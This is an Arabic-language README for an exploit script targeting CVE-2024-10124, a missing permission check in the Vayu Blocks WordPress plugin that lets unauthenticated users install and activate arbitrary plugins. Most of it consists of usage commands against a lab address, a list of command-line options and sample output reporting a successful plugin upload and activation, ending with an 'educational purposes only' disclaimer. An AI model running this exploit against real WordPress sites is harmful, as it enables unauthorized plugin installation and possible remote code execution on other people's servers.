
إن إضافة Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce في ووردبريس عرضة للتثبيت والتفعيل العشوائي غير المصرح به للإضافات بسبب عدم وجود فحص للصلاحيات في الدالة tp_install() في جميع الإصدارات حتى 1.1.1 وما يشملها. وهذا يتيح للمهاجمين غير المصادَق عليهم تثبيت وتفعيل إضافات عشوائية، وهو ما يمكن استغلاله لتحقيق تنفيذ التعليمات البرمجية عن بُعد إذا تم تثبيت وتفعيل إضافة أخرى عرضة للثغرة. تم تصحيح هذه الثغرة جزئيًا في الإصدار 1.1.1.
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version
سيتحقق هذا من إصدار إضافة vayu-blocks لتحديد ما إذا كان الموقع عرضة للثغرة.
python CVE-2024-10124.py -u http://192.168.100.74/wordpress
سيؤدي هذا إلى تثبيت الإضافة الافتراضية hello-dolly.
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name
سيؤدي هذا إلى تثبيت إضافة plugin_name على الموقع المستهدف.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g., http://192.168.100.74/wordpress)
-p PLUGIN, --plugin PLUGIN
Plugin name (default: hello-dolly)
--check-version Check if the site is vulnerable based on plugin version
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"
هذا السكربت مقدم للأغراض التعليمية فقط. المؤلف غير مسؤول عن أي أضرار ناتجة عن إساءة استخدام هذا السكربت.
| 🔍 | الأمر | الوصف | مثال |
|---|
| 🌐 | -u or --url | تحديد عنوان URL المستهدف لموقع ووردبريس. | -u http://192.168.100.74/wordpress |
| 🔒 | --check-version | التحقق مما إذا كان الموقع عرضة للثغرة بناءً على الإصدار. | -u http://192.168.100.74/wordpress --check-version |
| ⚙️ | -p or --plugin | تحديد اسم الإضافة (الافتراضي هو hello-dolly). | -u http://192.168.100.74/wordpress -p plugin_name |